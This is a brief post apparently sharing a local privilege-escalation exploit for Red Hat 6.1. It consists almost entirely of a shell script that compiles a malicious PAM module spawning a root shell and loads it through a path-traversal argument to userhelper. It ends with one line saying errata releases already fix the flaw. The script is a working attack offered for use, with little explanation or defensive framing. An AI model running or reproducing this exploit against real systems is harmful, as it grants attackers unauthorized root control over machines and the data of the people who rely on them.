by using the script, any normal user on a redhat 61 sever is able to get 'root' rights. The 'id' gets changed to 'root'. #!/bin/sh cat > _pamslam.c << EOF #include<stdlib.h> #include<unistd.h> #include<sys/types.h> void _init(void) { setuid(geteuid()); system("/bin/sh"); } EOF echo -n . echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf chmod 755 _pamslam.conf echo -n . gcc -fPIC -o _pamslam.o -c _pamslam.c echo -n o ld -shared -o _pamslam.so _pamslam.o echo -n o chmod 755 _pamslam.so echo -n O echo O /usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf sleep 1s
This has already been fixed in the errata releases...